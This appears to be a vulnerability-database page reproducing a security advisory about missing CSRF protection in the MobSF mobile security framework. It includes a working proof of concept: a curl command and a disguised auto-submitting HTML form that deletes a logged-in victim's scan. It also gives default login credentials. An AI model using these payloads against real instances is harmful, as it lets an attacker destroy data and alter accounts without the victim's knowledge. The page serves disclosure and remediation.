Open-Source Security Intelligence

Know every vulnerability
before it knows you.

DevGuard continuously monitors your dependencies and alerts you when CVEs like this one affect your stack — with real-time threat intelligence built for developers.

Search

GHSA-3p54-567p-2wpr

MediumCVSS 6.5 / 10
Published Aug 18, 2026·Last modified Aug 18, 2026
Affected Components(1)
PyPI logomobsf
< 4.5.1
Description

Summary

Django's CsrfViewMiddleware exists only in the deprecated MIDDLEWARE_CLASSES (ignored since Django 2.0). The active MIDDLEWARE tuple does not include it. All authenticated web POST endpoints (delete scan, upload, download APK, change password, manage users) accept requests without CSRF tokens.

Verified Impact

This was verified by actually deleting a real scan from the running server using only a session cookie — no CSRF token was required:

$ curl -s -b cookies.txt -X POST "http://127.0.0.1:8000/delete_scan/" \
    -d "md5=68e76627798d62555d5287f4488a32c7&scan_type=apk"
{"deleted": "yes"}

The scan was removed from the database. This attack works from any website via HTML form auto-submission because:

  • No CSRF token is validated (middleware absent)
  • Cookie SameSite=Lax allows form-based top-level navigation to send the session cookie

Affected Component

File: mobsf/MobSF/settings.py (Lines 206-212)

MIDDLEWARE = (
    'mobsf.MobSF.views.api.api_middleware.RestApiAuthMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    # MISSING: 'django.middleware.csrf.CsrfViewMiddleware'
)

Steps to Reproduce

1. Start MobSF v4.4.6 and log in at http://127.0.0.1:8000/login/ (creds: mobsf/mobsf).

2. Upload and scan any APK to create a scan entry. Note the MD5 hash from "Recent Scans".

3. Open the following HTML file in the same browser (simulates visiting attacker's page):

<!DOCTYPE html>
<html>
<head><title>Innocent Page</title></head>
<body>
<h1>Loading...</h1>
<form id="f" method="POST" action="http://127.0.0.1:8000/delete_scan/">
  <input type="hidden" name="md5" value="PUT_REAL_MD5_HASH_HERE" />
  <input type="hidden" name="scan_type" value="apk" />
</form>
<script>document.getElementById('f').submit();</script>
</body>
</html>

4. The scan is deleted. Navigate back to MobSF "Recent Scans" to confirm it's gone.

Why This Is Not a Self-Bug

  • The attack requires a victim user who is logged in to visit an attacker-controlled page
  • The attacker crafts the form targeting the victim's MobSF instance
  • All destructive POST endpoints are affected: /delete_scan/, /upload/, /download_scan/, /change_password/, /create_user/, /delete_user/
  • This matches the pattern of previously accepted MobSF advisories (e.g., GHSA-5jc6-h9w7-jm3p, GHSA-8m9j-2f32-2vx4)

Remediation

Add 'django.middleware.csrf.CsrfViewMiddleware' to the active MIDDLEWARE tuple.

Upload your SBOM

Upload your own SBOM in CycloneDX 1.6 or higher (JSON) directly here to check your vulnerabilities.

Risk Scores
Base Score
6.5

The vulnerability can be exploited over the network without needing physical access. It is easy for an attacker to exploit this vulnerability. An attacker does not need any special privileges or access rights. The attacker needs the user to perform some action, like clicking a link. The impact is confined to the system where the vulnerability exists. There is a high impact on the integrity of the data.

Threat Intelligence
6.0

Exploitation attempts have been detected. Elevated vigilance and prompt remediation are advised.

EPSS
0.26%

The exploit probability is very low. The vulnerability is unlikely to be exploited in the next 30 days.

Exploit
Not available

We did not find any exploit available. Neither in GitHub repositories nor in the Exploit-Database.

Browse More

Scan your project

Continuously monitor your dependencies and get alerted when vulnerabilities like this one affect your stack.

Checkout DevGuard